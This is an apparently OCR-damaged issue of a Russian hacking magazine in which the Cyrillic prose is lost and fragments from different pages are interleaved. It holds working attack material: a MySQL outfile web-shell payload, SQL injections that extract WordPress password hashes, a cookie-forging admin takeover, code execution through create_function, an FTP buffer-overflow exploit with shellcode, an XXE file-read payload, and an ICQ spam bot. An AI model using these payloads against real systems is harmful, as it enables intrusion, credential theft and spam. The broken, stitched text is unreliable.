UDF (, User-Defined-Function,

)
SHA-:
CREATE FUNCTION ud_MakeSHA1 (@clearpass VARCHAR (8000) )
RETURNS VARCHAR (40)
AS
BEGIN
    DECLARE @ret as VARCHAR(40)
    EXEC master..xp_sha1 @clearpass, @ret OUTPUT
    RETURN @ret
END

SysComments Decryptor ,

: MS SQL
, ,
SQL Shield

: UPDATE tbl_CCards SET password = dbo.ud_MakeSHA1(Password).
. ?
, ! ,

. ,
, :
CREATE FUNCTION ud_CheckUser (@username VARCHAR(16), @clear_pass VARCHAR (16))
RETURNS INTEGER
AS BEGIN
    DECLARE @res INTEGER
    SELECT @res = count(*) FROM tbl_CCards where username=@username AND password=dbo.ud_MakeSHA1(@clear_pass)
    IF @res > 1 SELECT @res= 0
    RETURN @res
END

:
SELECT dbo.ud_CheckUser ('anna','kolbaska')
>1 ()
SELECT dbo.ud_CheckUser ('anna','love')
>0 (!)


. ,

- (
PCI; , ,
). XP_CRYPT

256- RSA.
- ( , , 768- ).

, .
,

, .
, ! z

>>

Easy Hack}
R0ID

SKVOZ

PSYCHO.

/ R0ID@MAIL.RU /

/ KOMAROV@ITDEFENCE.RU /

/ X0WL.X0WL@GMAIL.COM /

: MYSQL
:
1. Web- , .
:
/templates_compiled/
/templates_c/
/templates/

: PHPMYADMIN
:
1. - PhpMyAdmin.
2. :

/temporary/
/images/
/cache/
/temp/
/files/

2. (, 4), :
UNION SELECT "<? system($_REQUEST['cmd']); ?>",2,3,4
INTO OUTFILE "/var/www/html/temp/c.php" --

3. http://victim.com/temp/c.php.

4. :
CREATE TABLE backdoor(
Stack TEXT
) TYPE=MYISaM;
INSERT INTO backdoor(Stack)
VALUES(
'<pre><body bgcolor=silver<? @system($_
REQUEST["v"]); ?></body></pre>')

CREATE DATABASE 'backdoor'

5.
3.
SELECT @@datadir
> C:\AppServ\MySQL\data\

: ,
:
, , ,
- . ,
online-flv.
, :
1. ru.savefrom.net. ,
.
2. . HTML-
.

038

SELECT * into dumpfile 'C:\AppServ\www\s.php' from


backdoor;

6. victim.com/s.php?v=.

3. URL .
4. ,
, . URL flv-.

>>

4
: BIND 8 BIND 9, ,

:
Bind 9 ( 9.1.0) CHAOS- authors.

.
1. linux/freebsd
dig ns.example.com authors.bind chaos txt
2. windows/linux/freebsd
% nslookup -q=txt -class=CHAOS authors.bind. ns.example.com
Server: ns.example.com

:
:
, .
Malzilla (malzilla.sourceforge.net).
, unescape-

Address: 23.23.23.23
authors.bind text = Bob Halley
authors.bind text = Mark Andrews
authors.bind text = James Brister
authors.bind text = Michael Graff
authors.bind text = David Lawrence
authors.bind text = Michael Sawyer
authors.bind text = Brian Wellington
authors.bind text = Andreas Gustafsson

3. , !
, :
alert UDP $EXTERNAL any -> $INTERNAL 53 (msg: "IDS480/named-probe-authors"; content: "|07|authors|04|bind"; depth: 32; offset: 12; nocase;)

UDP- 53 ,
, , .

, UCS2- JS . ,
:
1.
Download.
2. Send script to Decoder, Run script.
3. ( )
.
4. , Misc
decoders.
, malware- :
malwaredomainlist.com, zeustracker.abuse.ch.

! Malzilla .exe


039

>>

: ICQ- PHP
:
ICQ- . ,
,
. , :
? ,
PHP. , ? ,
:
1.
WebIcqLite.class.php, DVD.
2.
include('WebIcqLite.class.php');

3. , Pashkela:
<?php
@set_time_limit(0);
@ini_set("display_errors","1");
ignore_user_abort(1);
include('WebIcqLite.class.php');
$ini = parse_ini_file("icq.ini");
$uin = $ini[uin];
// UIN
$pass = $ini[pass];
// UIN
$file_uin = $ini[file_uin]; // ,
$message = $ini[message];
//
$pause = $ini[pause];
//
define('UIN', $uin);
define('PASSWORD', $pass);
$icq = new WebIcqLite();
if(!$icq->connect(UIN, PASSWORD)) {

: PASSWORDPRO FTP-
:

PasswordPro.
:). ,
. ,
SQL- , MySQL-
PasswordPro. ,
, FTP.
,
PasswordPro admin:5ba686200919b19f:narym7
- ftp://admin:narym7@127.0.0.1. , :
1. , , Small
parser for passwordpro evil_packman DVD :). 2. PasswordPro first.txt, :

ICQ- PHP
echo $icq->error;
exit();
}
$file = fopen($file_uin,'r');
while (!feof($file)) {
$buffer = trim(fgets($file));
$icq->send_message($buffer, $message);
echo Message sent to $buffer \n;
flush();
sleep($pause);
}
$icq->disconnect();
exit();
?>

4. icq.ini :
uin = 123456 ; UIN,
pass = 1234 ; UIN,
file_uin = uin.txt ; UIN
message = test, do not reply this message, bot-test ;
,
pause = 2 ; ,
( )

5. uin.txt ,
.
, .
:).

web:5ba686200919b19f:nfgavr

2. , PHP.
( :)).
3. first.txt ( )
.
4. :
C:\php\php C:\parser.php first.txt out.txt 127.0.0.1,

first.txt PasswordPro, out.txt , 127.0.0.1 IP ftp-.


5. out.txt c:
PasswordPro

admin:5ba686200919b19f:narym7
news:5ba686200919b19f:wens6
root:5ba686200919b19f:sawbdv
swin:5ba686200919b19f:zasut4

040

ftp://admin:narym7@127.0.0.1
ftp://news:wens6@127.0.0.1
ftp://root:sawbdv@127.0.0.1
ftp://swin:zasut4@127.0.0.1

:
, Blind SQL-Injections
SQL-, . , .
,
, . Grey, - .
:
: version(), user(),
database(), mysql >= 3 .
, mysql >= 4.1 .
,
mysql >= 4.1 .
, mysql >= 4.1
.
, mysql >= 3 .
, -
, mysql >= 4.1 .
, information_schema.tables mysql => 5
.
, , information_schema.
columns mysql => 5 .
, information_schema.tables mysql => 5
.
;
, :
, ;
, .
PostgreSQL: version(),
current_user(), current_database().
PostgreSQL.

ftp://web:nfgavr@127.0.0.1

, -
FTP.


dic/grey_field_name.txt

3. (
) .
4. , config.php main.php.
5. config.php.
:
$host = ''; //
$port = ; //
$path = ''; // ( /)
$vars = ""; // ( ,
sql- ):
,
// , , , , ,

$strend = ''; // ('--+', '/*', '#'),



$method = ; // ():
// 0 POST; POST
// 1 GET; GET
// 2 GET/COOKIE; COOKIE
$type = ; // (0 1): sql-:
// 0
,

// 1
( ),

$text = ; // ,

6. http:////main.php.
7. 30 , -
.
8. result.txt.
! ,
, . z
Blind SQL-Injections

, :
1. DVD.
2. , :
main.php
config.php
lib_and_data/grey_data.php

lib_and_data/function.php
sql-
dic/grey_table_name.txt

>>

SKVOZ

01

WORDPRESS MU

>> Brief
Wordpress MU ,
( ). choose_primary_blog ( wp-includes/wpmu-functions.php).
.
1830 function choose_primary_blog() {
1831     global $current_user;
1832     ?>
1833     <table class="form-table">
1834     <tr>
1835         <th scope="row"><?php _e('Primary Blog'); ?></th>
1836         <td>
1837         <?php
1838         $all_blogs = get_blogs_of_user( $current_user->ID );
1839         if( count( $all_blogs ) > 1 ) {
...
1848         } else {
1849             echo $_SERVER['HTTP_HOST'];
1850         }
1851         ?>
1852         </td>
1853     </tr>
1854     </table>
1855     <?php
1856 }

1849 , ,
- , HTML/
JS-. HTTP- , WEB-
(WebScarab, Burpsuite).

042


>> Targets:
Wordpress MU < 2.7
>> Exploit
$ curl -H "Cookie: " -H Host: <body
onload=alert(String.fromCharCode(88,83,83))>"
http://www.example.com/wp-admin/profile.php> tmp.html
$ firefox tmp.html

>> Solution
, ( ,
WordPress , . Forb).

APPLE MACOS X XNU <= 1228.X LOCAL KERNEL


MEMORY
DISCLOSURE
>> Brief
Apple MacOS
i386_set_ldt
i386_get_ldt .
, Intel-based . , ,
2005 FreeBSD
( , Unix- ). ,
MacOS. , : ( GDT), (
), .
(LDT) , . ,
LDT, GDT (
).
Pentium : LDT GDT.
i386_get_ldt , LDT (Local Descriptor Table) .
:
#include <machine/segments.h>
#include <machine/sysarch.h>
int i386_get_ldt (int start_sel, union descriptor
*descs, int num_sels);

,
.

>> Targets
Apple Mac OS X <10.5.6

>>

if (n < 0)
{
fprintf (stderr, "failed i386_get_ldt(): %d\n", n);
return (EXIT_FAILURE);
}
num_desc = n;
printf ("i386_get_ldt: num_desc: %d\n", num_desc);
fd = open (
TMP_FILE, O_CREAT | O_RDWR, S_IRUSR | S_IWUSR);
if (fd < 0)
{
fprintf (stderr, "failed open(): %d\n", fd);
return (EXIT_FAILURE);
}
// mmap
ptr = mmap (NULL, READ_SIZE, PROT_READ | PROT_WRITE,
MAP_ANON | MAP_PRIVATE, -1, 0);
if ((int) ptr == -1)
{
fprintf (stderr, "failed mmap()\n");
return (EXIT_FAILURE);
}
// ,
READ_SIZE ptr
memset (ptr, 0x00, READ_SIZE);
i386_get_ldt (num_desc 1,
(union ldt_entry *) ptr, -(num_desc 1));
//
n = write (fd, ptr, READ_SIZE);
munmap (ptr, READ_SIZE);
close (fd);
printf ("%d-bytes of kernel memory dumped to: %s\n",
n, TMP_FILE);
return (EXIT_SUCCESS);
}

>> Solution
.

02

FULL DISCLOSURE

FTP-.

>> Brief
, fuzzing FTP-.
win32_exec payloada -
, ,

>> Exploit
http://milw0rm.com/exploits/8108
:
#define TMP_FILE "/tmp/xnu-get_ldt"
#define READ_SIZE 0x2000000
int
main (int argc, char **argv)
{
int fd, n, num_desc;
void *ptr;
n = i386_get_ldt (0, ((int)NULL) + 1, 0);

043

>>

calc.exe

: ,
.
, FTP-
. ,
( )
,
.
, ,
Infigo FTP Fuzz (infigo.hr/files/ftpfuzz.zip). , .
anonymous-, -
. ,

(OllyDbg).
Olly. , . FaultMon (research.eeye.com/html/tools/RT20060801-4.
html) .
OllyDbg -P ( PID ).
FaultMon.
Golden FTPd. .
Olly,
Debug > Restart. -
USER , EIP 41414141.
, 3000 .
-
. OllyDbg: Overflow
Return Address ASCII Overflow returns Search JMP/Call ESP.
, View Log, jmp esp, call esp DLL.
View Executable Modules OpCodeDB Metasploit
: 0x750362c3 ws2_32.dll (opcode
pop,pop.ret). , pop,pop.ret.
, ,
pop (0x750362c4).
- win32_exec Metasploit (payloads):

EIP


# (3000 bytes)
sc = 'A' * 3000
# calc.exe Shellcode(172 bytes)

sc += "\x31\xc9\x83\xe9\xdb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8"
sc += "\x22\x72\xe4\x83\xeb\xfc\xe2\xf4\x24\xca\x34\xe4\xd8\x22\xf9\xa1"
sc += "\xe4\xa9\x0e\xe1\xa0\x23\x9d\x6f\x97\x3a\xf9\xbb\xf8\x23\x99\x07"
sc += "\xf6\x6b\xf9\xd0\x53\x23\x9c\xd5\x18\xbb\xde\x60\x18\x56\x75\x25"
sc += "\x12\x2f\x73\x26\x33\xd6\x49\xb0\xfc\x26\x07\x07\x53\x7d\x56\xe5"
sc += "\x33\x44\xf9\xe8\x93\xa9\x2d\xf8\xd9\xc9\xf9\xf8\x53\x23\x99\x6d"
sc += "\x84\x06\x76\x27\xe9\xe2\x16\x6f\x98\x12\xf7\x24\xa0\x2d\xf9\xa4"
sc += "\xd4\xa9\x02\xf8\x75\xa9\x1a\xec\x31\x29\x72\xe4\xd8\xa9\x32\xd0"
sc += "\xdd\x5e\x72\xe4\xd8\xa9\x1a\xd8\x87\x13\x84\x84\x8e\xc9\x7f\x8c"
sc += "\x28\xa8\x76\xbb\xb0\xba\x8c\x6e\xd6\x75\x8d\x03\x30\xcc\x8d\x1b"
sc += "\x27\x41\x13\x88\xbb\x0c\x17\x9c\xbd\x22\x72\xe4"

# Windows 2000 SP0,1,2,3,4 (pop,pop,ret+1)= (pop,ret)


# Thanks Metasploit!

return_address='\xC5\x2A\x02\x75'
buffer = '\xEB\x30' + ' /' + sc + return_address + '\r\n\r\n'
print buffer

!
calc.exe
.
.
antiparser (antiparser.sourceforge.net) API, Python
.
?


apChar()
apCString() ( ),

apKeywords() ,

FTP-


apLong() 32-
apShort() 16-
apString() (aka free form
string)

apKeywords(). , : [ (, FTP)]
[][ ( )][
]. FTP :
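# import the antiparser API
from antiparser import *

# lab test server (assumed values; the listing does not define HOST and PORT)
HOST = "127.0.0.1"
PORT = 21

# FTP commands to test
CMDLIST = ['ABOR', 'ALLO', 'APPE', 'CDUP', 'XCUP',
           'CWD', 'XCWD', 'DELE', 'HELP', 'LIST', 'MKD', 'XMKD',
           'MACB', 'MODE', 'MTMD', 'NLST', 'NOOP', 'PASS', 'PASV',
           'PORT', 'PWD', 'XPWD', 'QUIT', 'REIN', 'RETR', 'RMD',
           'XRMD', 'REST', 'RNFR', 'RNTO', 'SITE', 'SIZE', 'STAT',
           'STOR', 'STRU', 'STOU', 'SYST', 'TYPE', 'USER']
# separator between keyword and content, and the line terminator
SEPARATOR = ""
TERMINATOR = "\r\n"
for cmd in CMDLIST:
    # create the antiparser API object
    ap = antiparser()
    # keyword object for the command under test
    cmdkw = apKeywords()
    # set the keyword, the separator and the terminator
    cmdkw.setKeywords([cmd])
    cmdkw.setSeparator(SEPARATOR)
    cmdkw.setTerminator(TERMINATOR)
    # content that follows the keyword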

    cmdkw.setContent(r"%n%n%n%n%n%n%n%n%n%n%n%")
    # incremental mode, up to a maximum size of 65536
    cmdkw.setMode('incremental')
    cmdkw.setMaxSize(65536)


03

NEXTAPP
ECHO XML
INJECTION

>> Brief:
. : XML-, ,
XML-.
:

, Http-Analyzer Mozilla
Tamper Data,

    ap.append(cmdkw)
    # connect, send the generated payload and print the server replies
    sock = apSocket()
    sock.connect(HOST, PORT)
    print sock.recv(1024)
    sock.sendTCP(ap.getPayload())
    print sock.recv(1024)
    sock.close()

.
CWD/CDUP. Access violation
, ,
( Read of).
(Write to) , ,
.
OllyDbg (Options Debugging
Options Exceptions) Memory Access Violation, Single Step Break.

>> Targets
:
WinFTP 2.3.0
LIST (LIST *<>). arbitrary- (http://milw0rm.com/exploits/7875).
GuildFTPd FTP Server Version 0.x.x
DELETE (http://milw0rm.com/exploits/8200).
directory traversal ( \..).
WFTPD Explorer Pro 1.0
(http://milw0rm.com/exploits/7913).
Serv-U 7.4.0.1
(http://milw0rm.com/exploits/8211).
, ,

. , , . ( 2000) SMNT

.


<client-message xmlns="http://www.nextapp.com/products/echo2/climsg" trans-id="3" focus="c_25">
<message-part xmlns="" processor="EchoPropertyUpdate">
<property component-id="c_25" name="text">aa</property>
<property component-id="c_25" name="horizontalScroll" value="0"/>
<property component-id="c_25" name="verticalScroll" value="0"/>
</message-part>
<message-part xmlns="" processor="EchoAction">
<action component-id="c_25" name="action"/>
</message-part>
</client-message>

:
<?xml version="1.0"?><!DOCTYPE sec [<!ELEMENT sec ANY><!ENTITY mytestentity SYSTEM "file:///c:\boot.ini">]>

, XML . , ,
, boot.ini, XML-.

>> Targets
NextApp Echo < 2.1.1
>> Exploits
http://milw0rm.com/exploits/8191
, XML-requesta
JS/HTTP-POST.

04

FTS_*
LIBC (HTTP://MILW0RM.COM/
EXPLOITS/8163).


. fts
UNIX fts_open()
,
:
fts_read ,
;
fts_children() ,
.
, :

typedef struct _ftsent {
    unsigned short fts_info;    /* flags for FTSENT structure */
    char *fts_accpath;          /* access path */
    char *fts_path;             /* root path */
    size_t fts_pathlen;         /* strlen(fts_path) */
    char *fts_name;             /* file name */
    size_t fts_namelen;         /* strlen(fts_name) */
    short fts_level;            /* depth (-1 to N) */
    int fts_errno;              /* file errno */
    long fts_number;            /* local numeric value */
    void *fts_pointer;          /* local address value */
    struct _ftsent *fts_parent; /* parent directory */
    struct _ftsent *fts_link;   /* next file structure */
    struct _ftsent *fts_cycle;  /* cycle structure */
    struct stat *fts_statp;     /* stat(2) information */
} FTSENT;

, fts_level short. . :
- ---line-616-625---
/*
 * Figure out the max file name length that can be stored in the
 * current path -- the inner loop allocates more path as necessary.
 * We really wouldn't have to do the maxlen calculations here, we
 * could do them in fts_read before returning the path, but it's a
 * lot easier here since the length is part of the dirent structure.
 *
 * If not changing directories set a pointer so that can just append
 * each new name into the path.
 */
- ---line-616-625---

, - ...
pathlen-. , ,
? , , .
#define NAPPEND(p) \
    (p->fts_path[p->fts_pathlen - 1] == '/' \
    ? p->fts_pathlen - 1 : p->fts_pathlen)

, , .
127# pwd
/home/cxib
#
127# du /home/
4
/home/cxib/.ssh
Segmentation fault (core dumped)
127# rm -rf Samotnosc
Segmentation fault (core dumped)
127# chmod -R 000 Samotnosc
Segmentation fault (core dumped)

>> Targets
OpenBSD 4.4 (/usr/src/lib/libc/gen/fts.c)
Microsoft Interix 6.0 10.0.6030.0 x86
Microsoft Vista Enterprise (SearchIndexer.exe)
Secunia

BID

OSVDB

SKVZ
/ KOMAROV@ITDEFENCE.RU /

ISS X-Force

,
,
. , ,
. ,

>>

? .


.
.
,
.
CVE,
NCSD (National Cyber
Security Division)
. .

CVE (COMMON VULNERABILITIES AND EXPOSURES)
, CVE ,
, ,
, Bugtrack-. CVE
(NVD nvd.nist.gov) (cve.mitre.org/data/downloads).
,


: xml, html, csf, xsd schema. -


,
CVE
( ,
).
CVE :
CVE ID, Reference Description.

ID , CVE-1999-03.
Reference
,
.
Description . , CVE
, ,
WEB-.
,
-

:
(, ),
, .
?
()
. -,
,

.

. MITRE Corporation (mitre.org) , ,
.
,
.
. ,

BID

OSVDB

Secunia


. $5000 .

BID
Securityfocus (
securityfocus.com/vulnerabilities).
BID CVE. ,
BID CVE ,
, .

, ,
..
,
, , ,
BID
.
OSVDB
:
.
.
.

. :
( / ) ( ,
-
).
SECUNIA
,
secunia.com,

.
, - ,
,

.

, . CVSS v.2
: ,
.
.

ISS X-FORCE
ISS , -,
,
. , Microsoft Excel Remote
Code Execution,
,
,

.
,
security- Perimetrix
(securitylab.ru/blog/company/Perimetrix_blog).

.

CVSS 2.
,
.

.


CVSS Base Score =
9.2. ?
:


. .
undercover vulnerabilities , . ,
(securitymetrics.org/content/Wiki.jsp), ,
.
.


BaseScore = round_to_1_decimal(((0.6*Impact)+(0.4*Exploitability)-1.5)*f(Impact))

.
first.org/cvss.
, .
: AV:N/AC:L/Au:N/C:N/I:N/A:C.
, !
. , .
Access Vector: Network
.
,
.



. , ,
, ,
.
, ,
. ,
-
.
,
. ,
,
-. .

Secunia

Base Score Microsoft Windows


Kernel GDI

. CVE

info

Unix
Known Problem
List, Internal Sun
Microsystems Bug
List,

CERT
.

BID

.
.
RPC.
Access Complexity: Low :
.
, ,
.
Authentication: None . , ,
-
(-, , ),
.
Confidentiality Impact: None
. Integrity Impact: None .
.
,
, C () P (, partial).
Availability Impact: Complete , ,
, .
, Availability Impact Complete.



. ,
.
.
? ,


. ,
, ( ,
, ).
,
.
? , , .
? .
.
Exploitability (E) . ,
.
(, , ),
. ,
. : U ( ), Proof-of-Concept (POC
), F (,
), H (high risk ,

), ND ( ,
,
). Remediation Level (RL) .
,
? ,
(, ),


.
Report Confidence (RC) .
!
BID

OSVDB

Secunia

osvdb.org.
,


CVSS

:
.
,
.

?
Report Confidence.
//.




. ,

. Collateral Damage Potential (CDP)
.
. , , DoS-.

, CVSS (2).
, , .
, . Base Score NVD

,
, .

- ( ).
Target Distribution (TD) .
,

? ,
,
, .



-
. -, , -
. ,
(NERC-CIP,



CVE: ISS, BID, Secunia, SecurityTracker, OSVDB
BID: CVE, Bugtraq, ISS, Secunia, SecurityTracker, OSVDB
ISS: CVE, BID, Secunia, SecurityTracker, OSVDB
Secunia: CVE, OSVDB
SecurityTracker: CVE, OSVDB, Nessus
Nessus: CVE, BID, OSVDB
OSVDB: CVE, BID, Secunia, SecurityTracker, ISS, Nessus, Snort


PCI, FISMA, GLBA HIPAA)


, ,
. , AirMagnet,
ISS
Security Scanner.
ID. Nessus,
.



, Common
Criteria Web Application Security Scoring
(CCWAPSS) 1.1. ,
, ,
.
?
, . ,

, . ,
,
,
,

. z


SKVZ
/ KOMAROV@ITDEFENCE.RU /

WordPress:

WordPress , ( Powered by WordPress 74 400 000


!). , . : 5-
, , , seo-friendly
.

>>

?
][
WordPress.
.
, - SQL-
2.2.2 28 2007 Alexander
Concha ( ).
, ,
advisory .
. , 2.3.3 ,
XSS- html kses ( , , ). ,
: ,
, .
Charset
Remote SQL Injection ( <=2.3.3), -. ?
MySQL GBK BIG5.
.


WordPress <=2.3.2 xmlrpc.php Post


Edit Unauthorized Access Vulnerability ( FAQ United),
subscriber . , draft, . , .
2.3.x , WordPress cat
Parameter Directory Traversal Vulnerability, FAQ. ,
, Windows-.
SQL Column
Truncation (Admin Takeover),
.
, ,
rainbow 40 80 (, 2-4 ), ,
.
? . , .
, ,
.

WORDPRESS COMMENTS HTML SPAM VULNERABILITY


,
WordPress Comments Html Spam Vulnerability.
, 1.5
( ) 2.7.1.
. ./wp-includes/
comment.php :
function check_comment($author, $email, $url, $comment,
$user_ip, $user_agent, $comment_type) {
...
if ( 'trackback' == $comment_type || 'pingback' ==
$comment_type ) { // check if domain is in blogroll
$uri = parse_url($url);
$domain = $uri['host'];
$uri = parse_url( get_option('home') );
$home_domain = $uri['host'];
if ( $wpdb->get_var($wpdb->prepare("SELECT
link_id FROM $wpdb->links WHERE link_url LIKE (%s) LIMIT
1", '%'.$domain.'%')) || $domain == $home_domain )
return true;
else
return false;
}
...
}

?
1. URL , parse_url ( , Trackback,
).
2. (
), check_comment() true.
3. check_comment(),
.
.
. WordPress
- , parse_url.
http://www.php.net/parse_url: This function is not meant to
validate the given URL.
, parse_url()
! -
http://%/suck_wordpress, $uri[host]
%.
, , evil- sql-,
:
"SELECT link_id FROM wp_links WHERE link_url LIKE ('%%%') LIMIT 1"

true, - :).
! ./wp-trackback.php, ($excerpt)
:
function wp_html_excerpt( $str, $count ) {
    $str = strip_tags( $str );
    $str = mb_strcut( $str, 0, $count );
    // remove part of an entity at the end
    $str = preg_replace( '/&[^;\s]{0,6}$/', '', $str );
    return $str;
}

, . :
1. strip_tags() <br/> ( ,
);
2. kses- html-,
.
, :
<html>
<form action="http://lamer.com/wp/wp-trackback.php?p=[ID_]" method="post">
: <input name="title" value="commenter"/><br/>
URL:<input name="url" value="http://%/la.com"/><br/>
Comment:<input name="excerpt" value=""/><br/>
<input name="blog_name" value="Blog" /><br/>
<input type="submit" value="ok"/>
</form>
</html>

Comment :
< b >< a href="http"//ya.ru"> < / a >< / b >

,
. :
SEO Yahoo, , MSN,
rel=nofollow,
.

RSS- DASHBOARD

WordPress, RSS- . , Dashboard : , incoming links, devblog c wordpress.
org WordPress. 2.5,
Edit,
, .
,
( ). .
,
security- (
) . (, )
. - html-
- :
<form action="http://lamer.com/wp265/wp-admin/" method="post">
<input name="widget-rss[1][url]" type="text" value="http://___evilrss.com/feed.xml" />
<input name="widget-rss[1][title]" type="text" value=" " />
<input name="widget-rss[1][items]" value=" " />
<input name="widget-rss[1][show_summary]" type="checkbox" value="1" checked="checked"/>
<input name="widget-rss[1][show_author]" type="checkbox" value="1" />
<input name="widget-rss[1][show_date]" type="checkbox" value="1" checked="checked"/>
<input type="hidden" name="widget-rss[1][submit]" value="1" />
<input type='hidden' name='sidebar' value='wp_dashboard' />
<input type='hidden' name='widget_id' value='dashboard_primary' />
<input type='submit' value='Save' />
</form>

Opera
admin takeover

links
wordpress.org/download/releasearchive/ WordPress.
milw0rm.com/exploits/4721 Charset Remote SQL Injection Vulnerability.
buayacorp.com/files/wordpress/wordpress-sqlinjection-advisory.html Remote SQL Injection in WordPress and WordPress MU.
securityfocus.com/bid/27669 WordPress 'xmlrpc.php' Post Edit Unauthorized Access Vulnerability.
securityfocus.com/bid/28845 WordPress 'cat' Parameter Directory Traversal Vulnerability.

create_function

,
evil-rss :).
, :
1. ;
2. 2.5 2.6.5 .

. 1
,
WordPress Pingback
Trackback. , , , 2 (!) sql 2.5.1
author/editor (WordPress MU also affected).

2.3.3. ./wp-includes/post.php :
function add_ping($post_id, $uri) {
    // Add a URL to those already pung
    global $wpdb;
    $pung = $wpdb->get_var("SELECT pinged FROM $wpdb->posts WHERE ID = $post_id");
    $pung = trim($pung);
    $pung = preg_split('/\s/', $pung);
    $pung[] = $uri;
    $new = implode("\n", $pung);
    $new = apply_filters('add_ping', $new);
    return $wpdb->query("UPDATE $wpdb->posts SET pinged = '$new' WHERE ID = $post_id");
}

, add_ping
.
,
- !
.
:). ,
:
1. . :
<a href="http://_/?p=[_
]">pingme</a>

(, http://lamer/
wp1/?p=2).
2. 2.3.x-2.5.1 , Send trackbacks to: :
test',post_title=(select/**/concat(user_
login,':',user_pass)/**/from/**/wp_users/**/
where/**/id=1),post_content_filtered =blah

.
,
html-
:

Parse_str sql-

WordPress

<a href="http://lamer/wp1/?p=2">pingme</a>

! ,


SQL-,
,
2.3.X
2.7.1.
.

. 2
SQL-
. ./wp-includes/comment.php :
function do_trackbacks($post_id) {
    ...
    $to_ping = get_to_ping($post_id);
    ...
    if ( $to_ping ) {
        foreach ( (array) $to_ping as $tb_ping ) {
            $tb_ping = trim($tb_ping);
            if ( !in_array($tb_ping, $pinged) ) {
                trackback($tb_ping, $post_title, $excerpt, $post_id);
                $pinged[] = $tb_ping;
            } else {
                $wpdb->query("UPDATE $wpdb->posts SET to_ping = TRIM(REPLACE(to_ping, '$tb_ping', '')) WHERE ID = '$post_id'");
            }
        }
    }
}

: $to_ping - .
SQL- .
1. Send trackbacks to: :
test','')),post_title=(select/**/concat(user_
login,':',user_pass)/**/from/**/wp_users/**/where/**/
id=1),post_content_filtered=TRIM(REPLACE(to_ping,'blah

2. ,
;
3. .
PARSE_STR
SQL-, , 2.3.x
2.7.1.
manage_links. WordPress 2.3.3. , ./wp-admin/link-manager.php.
:
get_bookmarks( "category=$cat_id&hide_invisible=0&orderby=$sqlorderby&hide_empty=0" );

, :
./wp-includes/bookmark.php
function get_bookmarks($args = '') {
...
$r = wp_parse_args( $args, $defaults );
extract( $r, EXTR_SKIP );
...
if ( ! empty($category_name) ) {
if ( $category = get_term_by('name',
$category_name, 'link_category') )
$category = $category->term_id;
}
...
./wp-includes/formatting.php
function wp_parse_args( $args, $defaults = '' ) {
if ( is_object($args) )
$r = get_object_vars($args);
else if ( is_array( $args ) )
$r =& $args;
else
wp_parse_str( $args, $r );
if ( is_array( $defaults ) )
return array_merge( $defaults, $r );
else
return $r;
}


Pingback sql-

Magic SEO Toolz WordPress

function wp_parse_str( $string, &$array ) {


parse_str( $string, $array );
if ( get_magic_quotes_gpc() )
$array = stripslashes_deep( $array );
$array = apply_filters( 'wp_parse_str', $array );
}
./wp-includes/taxonomy.php
function get_term_by($field, $value, $taxonomy, $output
= OBJECT, $filter = 'raw') {
...
} else if ( 'name' == $field ) {
// Assume already escaped
$field = 't.name';
...
$term = $wpdb->get_row("SELECT t.*, tt.* FROM
$wpdb->terms AS t INNER JOIN $wpdb->term_taxonomy
AS tt ON t.term_id = tt.term_id WHERE tt.taxonomy =
'$taxonomy' AND $field = '$value' LIMIT 1");

WordPress , :
1. parse_str urldecode, , - ( wp_parse_str stripslashes);
2. get_bookmarks()
parse_str (%26 urlencode).
, , blind sql-:
http://lamer.com/wp233/wp-admin/link-manager.php?cat_
id=all%26category_name=0%2527+union+select+1,2,3,4,5,
6,7,8,9,10+from+wp_users+where+1=1/*&order_by=order_
url&action=Update+%C2%BB

:
) 1=1 ;
) 1=2 .


WORDPRESS 2.5 COOKIE INTEGRITY


PROTECTION VULNERABILITY
, , Cookie Integrity Protection
Vulnerability. WordPress 2.5. advisory
, , . : 2.5, WordPress
,
. :
"wordpress_".COOKIEHASH = USERNAME . "|" . EXPIRY_TIME .
"|" . MAC

:
COOKIEHASH md5- URL , ;
USERNAME ;
EXPIRY_TIME ;
MAC HMAC-,
,
. , ,
.
, :
1. admin99;
2. ;
3. ( :
cookies) :
:
wordpress_[] = admin99||MAC
:
wordpress_[] = admin|99|MAC

,
.

WORDPRESS 2.7.X ADMIN REMOTE CODE EXECUTION EXPLOIT


create_function (
Ryat[puretot]) , - ,
!
2.7,
( 2.7.1) - .
./wp-admin/post.php:
if ( current_user_can('edit_post', $post_ID) ) {
    if ( $last = wp_check_post_lock( $post->ID ) ) {
        $last_user = get_userdata( $last );
        $last_user_name = $last_user ? $last_user->display_name : __('Somebody');
        $message = sprintf( __( 'Warning: %s is currently editing this post' ), wp_specialchars( $last_user_name ) );
        $message = str_replace( "'", "\'", "<div class='error'><p>$message</p></div>" );
        add_action('admin_notices', create_function( '', "echo '$message';" ) );
    }
    else {
        wp_set_post_lock( $post->ID );
        wp_enqueue_script('autosave');
    }
}

RSS- WordPress 2.5-2.6.5

WordPress 2.x

, edit_post
:
1. display_name - \;phpinfo();\.
$message :
Warning: \';phpinfo();\' is currently editing this post

2. $message stripslashes create_function(),


:
{
echo '<div class='error'><p>';phpinfo();'</p></div>';
}

, code exec.
. ,
admin, , ,
author/editor.


WordPress,
:). . ,
, . , SEO.

, :
.z

SHADOS
/ SHADOS@MAIL.RU/

CISCO

, !
( ) Cisco, .
, . -

>>

.
. : Cisco 2611
Ethernet-, 64 RAM 16
Flash. , (
DRAM flash
-
).
Cisco IOS Feature Navigator (tools.cisco.com/ITDIT/CFN/jsp/index.jsp), IOS
12.3(26)
(End-of-Sale
2003, End-of-Life 2008).
,

12.4 ( 12.4T). ,
:
Cisco

, ,
2600 , ,
2611XM.
:
flash-
48 MB ( 2611 16 MB)
SDRAM-
128 MB ( 2611 64 MB)
10/100 Fast
Ethernet ( 2611 10 /c
Ethernet)


Cisco IOS Feature Navigator


, IOS
12.4(23). IOS 12.4(21)
Enterprise Base Advanced
Security 128 MB DRAM 32 MB
flash. , 128 MB ,
,
.
,
.
.

EXTENDED,

Cisco IOS 12.4(21)
Enterprise Base
2611
, .

, 10- ,
, , in production.


- PIX (, ,
10 ),
,
IOS 12.4,
12.3?
Cisco IOS Feature Navigator (tools.cisco.com/ITDIT/CFN/Dispatch).
, ,
, .
,


(just for fun).

, .
DRAM . ,
,
. ,
core -
. ,

IOS 12.4 ,
16 B. :
c2600-entbasek9-mz.124-9.T1.bin ,
16,4 MB, 17 257 364 .
no-squeeze-reserve-space ( erase /no-squeeze-reserve-space flash:), .
, , c2600-ik9o3s3-mz.123-13.bin (
,

, ).

? !
tftp, ,
, .
, (,
).
Dynamips.
?

Advanced Enterprise Services


Advanced IP + Enterprise + Cisco IOS Firewall

